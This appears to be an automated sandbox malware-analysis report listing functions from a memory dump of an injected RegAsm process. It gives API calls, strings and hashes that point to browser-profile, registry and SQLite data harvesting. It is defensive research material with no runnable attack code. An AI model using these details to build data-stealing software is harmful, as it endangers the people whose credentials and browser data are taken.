Function 00410031 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00410045
??_U@YAPAXI@Z.MSVCRT ref: 00410066

Part of subcall function 0040FE7F: strlen.MSVCRT ref: 0040FE8B
Part of subcall function 0040FE7F: strlen.MSVCRT ref: 0040FEA1
Part of subcall function 0040FE7F: strlen.MSVCRT ref: 0040FF3A

VirtualQueryEx.KERNEL32(?,00000000,?,0000001C,?,?,?,?,?,?,00000000,?,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000,000000FF), ref: 00410093
VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 0041015D
??_V@YAXPAX@Z.MSVCRT ref: 0041016E

Strings

@, xrefs: 004100AC

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: strlen$QueryVirtual
String ID: @
API String ID: 3099930812-2766056989
Opcode ID: 6c804bf84b11ad4b76394026a79749fb282d72089fe2bde0d80cad753b650714
Instruction ID: 15ec421eac89412fce3c726d067cb399f279b8a4ce81eea167168eb44fe0b663
Opcode Fuzzy Hash: 6c804bf84b11ad4b76394026a79749fb282d72089fe2bde0d80cad753b650714
Instruction Fuzzy Hash: FB419071A00109BFDF14DF90DD45AEF7BB6EF88354F14802AF905A6250D3799E918BA8

Function 004125F8 Relevance: 10.6, APIs: 7, Instructions: 119stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004125FD
strtok_s.MSVCRT ref: 00412628
StrCmpCA.SHLWAPI(00000000,004276E8,00000001,?,?,?,00000000), ref: 0041266B
StrCmpCA.SHLWAPI(00000000,004276E4,00000001,?,?,?,00000000), ref: 00412699
StrCmpCA.SHLWAPI(00000000,004276E0,00000001,?,?,?,00000000), ref: 004126BE
StrCmpCA.SHLWAPI(00000000,004276DC,00000001,?,?,?,00000000), ref: 004126EF
strtok_s.MSVCRT ref: 00412725

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: strtok_s$H_prolog
String ID:
API String ID: 1158113254-0
Opcode ID: ad2d2b01a46ae452e053afeb30b9a020eeecc5415c15fa65622b3df304da52ee
Instruction ID: 1cebcff4cc2e9db1407917f8bcc2e32ce248289f5373c2d1f439f92f0ab1d0ce
Opcode Fuzzy Hash: ad2d2b01a46ae452e053afeb30b9a020eeecc5415c15fa65622b3df304da52ee
Instruction Fuzzy Hash: EE419C71A041069FCB24DF64CA81BEB77A8EF14315F10142FE015EA6D1E7BCC9918B58

Function 1B4831F0 Relevance: 9.5, APIs: 6, Instructions: 466COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f05d367b4e68a1254b368d8073f53f3e0894165b0ea93e48e20bb998c3fedce
Instruction ID: 34e0884efad26e712bcf0752924713962019c1fdc95ef2e3ad18310b91f63a55
Opcode Fuzzy Hash: 4f05d367b4e68a1254b368d8073f53f3e0894165b0ea93e48e20bb998c3fedce
Instruction Fuzzy Hash: BCF11471A043519FD701CF58D8C079ABBE0BF84624F44866DF8D99B361D335E986CB92

Function 00416F87 Relevance: 9.1, APIs: 6, Instructions: 128registrystringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00416F8C
memset.MSVCRT ref: 00416FB8
RegOpenKeyExA.ADVAPI32(80000001,00000000,00020119,?,?,?,00000000), ref: 00416FD5
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF,?,?,00000000), ref: 00416FF5
lstrcat.KERNEL32(?,?), ref: 00417024
lstrcat.KERNEL32(?), ref: 00417037

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$H_prologOpenQueryValuememset
String ID:
API String ID: 2333602472-0
Opcode ID: ffabbadf23559a5d2fe47dd9e3f0d540c4be59e331bc254610fc57c30e9faebe
Instruction ID: 55db34aee8dba0afd5685131b0cfb036c691298d6e0bbcff4ed3c803fe3ae383
Opcode Fuzzy Hash: ffabbadf23559a5d2fe47dd9e3f0d540c4be59e331bc254610fc57c30e9faebe
Instruction Fuzzy Hash: 07417CB1D4011DABDF10EFA0DC86EDE7B7DEB05308F00046AF608A2191E7359B998BD6

Function 1B5073E0 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 369COMMON

Download Yara Rule

Strings

SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 1B50776D
sqlite_temp_master, xrefs: 1B5073F2
ase, xrefs: 1B50768D
sqlite_master, xrefs: 1B5073FD

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: SELECT*FROM"%w".%s ORDER BY rowid$ase$sqlite_master$sqlite_temp_master
API String ID: 0-231581592
Opcode ID: 336e65b7ffceaa8808ac73e35ba91cd677d253eea882694e954657cbe1760991
Instruction ID: 644e48ff41863de9e42f684c324931f96861c56bc203e93ac46fccb34bb70745
Opcode Fuzzy Hash: 336e65b7ffceaa8808ac73e35ba91cd677d253eea882694e954657cbe1760991
Instruction Fuzzy Hash: 01E1E6B0E083419FF711CF28C881BDABBE4BF95704F04855CE99997252EB71E985CB92

Function 0041BF57 Relevance: 9.1, APIs: 6, Instructions: 98COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 0041BF65

Part of subcall function 0041A943: __mtinitlocknum.LIBCMT ref: 0041A959
Part of subcall function 0041A943: __amsg_exit.LIBCMT ref: 0041A965
Part of subcall function 0041A943: EnterCriticalSection.KERNEL32(00000000,00000000,?,0041B5B1,0000000D,?,?,0041BA05,0041A4A2,?,?,004195AB,00000000,0042DE30,004195F2,?), ref: 0041A96D

DecodePointer.KERNEL32(0042DDB8,00000020,0041C0A8,00000000,00000001,00000000,?,0041C0CA,000000FF,?,0041A96A,00000011,00000000,?,0041B5B1,0000000D), ref: 0041BFA1
DecodePointer.KERNEL32(?,0041C0CA,000000FF,?,0041A96A,00000011,00000000,?,0041B5B1,0000000D,?,?,0041BA05,0041A4A2), ref: 0041BFB2

Part of subcall function 0041B52A: EncodePointer.KERNEL32(00000000,0041F0FD,00641438,00000314,00000000,?,?,?,?,?,0041C2BF,00641438,Microsoft Visual C++ Runtime Library,00012010), ref: 0041B52C

DecodePointer.KERNEL32(-00000004,?,0041C0CA,000000FF,?,0041A96A,00000011,00000000,?,0041B5B1,0000000D,?,?,0041BA05,0041A4A2), ref: 0041BFD8
DecodePointer.KERNEL32(?,0041C0CA,000000FF,?,0041A96A,00000011,00000000,?,0041B5B1,0000000D,?,?,0041BA05,0041A4A2), ref: 0041BFEB
DecodePointer.KERNEL32(?,0041C0CA,000000FF,?,0041A96A,00000011,00000000,?,0041B5B1,0000000D,?,?,0041BA05,0041A4A2), ref: 0041BFF5

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2005412495-0
Opcode ID: c37056c1bac6b740b2cf57c28c114f4b0aa247efe940edb5e52200fe94324489
Instruction ID: 40d759d0af26c0e33048e5eeeb1d0d5b6d779b864769d88227b8ddda6ef59534
Opcode Fuzzy Hash: c37056c1bac6b740b2cf57c28c114f4b0aa247efe940edb5e52200fe94324489
Instruction Fuzzy Hash: AA312470A4030ADFDF10AFE5DD852EDBBF1BB09358F14412BE414A6250DBB989D28F69

Function 0041AD30 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0041AD3C

Part of subcall function 0041B694: __getptd_noexit.LIBCMT ref: 0041B697
Part of subcall function 0041B694: __amsg_exit.LIBCMT ref: 0041B6A4

__amsg_exit.LIBCMT ref: 0041AD5C
__lock.LIBCMT ref: 0041AD6C
InterlockedDecrement.KERNEL32(?), ref: 0041AD89
_free.LIBCMT ref: 0041AD9C
InterlockedIncrement.KERNEL32(0042F1C0), ref: 0041ADB4

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: d6b91549f481ba99b1a2cff0aceb38b51a3e4824080471a87e88109e4a847109
Instruction ID: 7a686a87ecf6862701e3a8e41fe3d151946ee7b1c04b077fb255fbefe0513ff2
Opcode Fuzzy Hash: d6b91549f481ba99b1a2cff0aceb38b51a3e4824080471a87e88109e4a847109
Instruction Fuzzy Hash: 19018831A02A21ABC730AF66A405BDE7771AF44726F94402BE404676A1C73C5DE2CBDF

Function 1B4DABF0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 204COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B4DAE0E
%s at line %d of [%.10s], xrefs: 1B4DAE1D
misuse, xrefs: 1B4DAE18
unable to delete/modify user-function due to active statements, xrefs: 1B4DAD61

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unable to delete/modify user-function due to active statements
API String ID: 0-3864549341
Opcode ID: 88f55cd1df8715848f5bd7e616d5b86f23a579be177d748b19cae8d7e26c92da
Instruction ID: 661bf3f406beb61372ded49fc829279abc09f8e772b5fd63bbc16b82d988f38f
Opcode Fuzzy Hash: 88f55cd1df8715848f5bd7e616d5b86f23a579be177d748b19cae8d7e26c92da
Instruction Fuzzy Hash: 14510272604700AFD7108F24DC90BAFB7F5EF99756F04892DF68696250E332E841CB62

Function 0040BD22 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 186stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040BD27

Part of subcall function 00410603: lstrcpy.KERNEL32(00000000,r~A), ref: 00410629

Part of subcall function 00406CC8: _EH_prolog.MSVCRT ref: 00406CCD
Part of subcall function 00406CC8: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406CF0
Part of subcall function 00406CC8: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406D07
Part of subcall function 00406CC8: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D23
Part of subcall function 00406CC8: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D3D
Part of subcall function 00406CC8: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406D5E

Part of subcall function 00411A16: LocalAlloc.KERNEL32(00000040,?,000000C8,00000001,?,00413DEE,00000000,00000000), ref: 00411A2F

Part of subcall function 004105CC: lstrcpy.KERNEL32(00000000,00000000), ref: 004105F6

Part of subcall function 00410745: _EH_prolog.MSVCRT ref: 0041074A
Part of subcall function 00410745: lstrlenA.KERNEL32(?,?,?,?,?,004185FE,?,?,00427BEC,?,00000000,00427727), ref: 00410772
Part of subcall function 00410745: lstrcpy.KERNEL32(00000000), ref: 00410799
Part of subcall function 00410745: lstrcat.KERNEL32(?,?), ref: 004107A4

Part of subcall function 0041068A: lstrcpy.KERNEL32(00000000,?), ref: 004106C3

Part of subcall function 004106D1: _EH_prolog.MSVCRT ref: 004106D6
Part of subcall function 004106D1: lstrcpy.KERNEL32(00000000), ref: 00410722
Part of subcall function 004106D1: lstrcat.KERNEL32(?,?), ref: 0041072C

StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00426FB8,00426CBF), ref: 0040BDE8
lstrlenA.KERNEL32(00000000), ref: 0040BE04

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 0040BAF1: _EH_prolog.MSVCRT ref: 0040BAF6

Strings

moz-extension+++, xrefs: 0040BE2A
^userContextId=4294967295, xrefs: 0040BE4F

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 2813378046-3310892237
Opcode ID: 419ef9a3954b666a7cd24065fff9166e636b525bd354b29f21418292cec83e0f
Instruction ID: 109bff0b295f40b67eb387a95d791df19313290b61abd69efb2be05c569f5f1e
Opcode Fuzzy Hash: 419ef9a3954b666a7cd24065fff9166e636b525bd354b29f21418292cec83e0f
Instruction Fuzzy Hash: 4F71A870C05288EEDF14EBE5D556BDDBBB8AF15304F10405EF84563282DBB81788DBA6

Function 1B3EA860 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 180COMMON

Download Yara Rule

Strings

argument to %s() is not a valid SQL statement, xrefs: 1B3EA97C
tables_used, xrefs: 1B3EA973, 1B3EA97B
stmt-pointer, xrefs: 1B3EA928
bytecode, xrefs: 1B3EA96E

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: argument to %s() is not a valid SQL statement$bytecode$stmt-pointer$tables_used
API String ID: 0-361449301
Opcode ID: bf29c0a4fad2f465e8eec413b4ddc9a089ae28b6e6c3b4fbe783bc0183a3a39f
Instruction ID: 4079ed8a1311e6ae098a735c4318b947ca43463ba77cadb492622a5df51ccaf3
Opcode Fuzzy Hash: bf29c0a4fad2f465e8eec413b4ddc9a089ae28b6e6c3b4fbe783bc0183a3a39f
Instruction Fuzzy Hash: FE61CFB15047569FEB148F24D885792B7E8EF44305F010A2EF886C6241E776E969CBB1

Function 1B4FBF00 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 156COMMON

Download Yara Rule

Strings

fts5: %s queries are not supported (detail!=full), xrefs: 1B4FC043
phrase, xrefs: 1B4FC035, 1B4FC042
NEAR, xrefs: 1B4FC03A
fts5 expression tree is too large (maximum depth %d), xrefs: 1B4FC070

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: NEAR$fts5 expression tree is too large (maximum depth %d)$fts5: %s queries are not supported (detail!=full)$phrase
API String ID: 0-593389478
Opcode ID: f7816e0621b4542a8239f847a92691c19a80a7fdc0dfc6e9a1e1034b81466b02
Instruction ID: 3192672c786d2cefd558951db29a2ff9956802ffe78809eb96c64fb047d3cd6c
Opcode Fuzzy Hash: f7816e0621b4542a8239f847a92691c19a80a7fdc0dfc6e9a1e1034b81466b02
Instruction Fuzzy Hash: 0241D331A002069FDB14CE58D880BDAB3A9EF85214F10C56DE945C7312E776EC86CB96

Function 1B41F490 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 143COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B41F4B0
%s at line %d of [%.10s], xrefs: 1B41F4BF
misuse, xrefs: 1B41F4BA
unable to delete/modify collation sequence due to active statements, xrefs: 1B41F533

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unable to delete/modify collation sequence due to active statements
API String ID: 0-3348720253
Opcode ID: b7ac1d5f034167eb8911b2bf0f4cf1e673e75b801a5aca6a6f6baffa58c87687
Instruction ID: 7001f2c6e851023eae13d131e22e212cc725ac74a0079495e025a4fe52647944
Opcode Fuzzy Hash: b7ac1d5f034167eb8911b2bf0f4cf1e673e75b801a5aca6a6f6baffa58c87687
Instruction Fuzzy Hash: 37414972A043005BD710AF18EC80BEAF7E4EF91315F18856EF5959F282E332F5168761

Function 00406EF1 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00406EF6
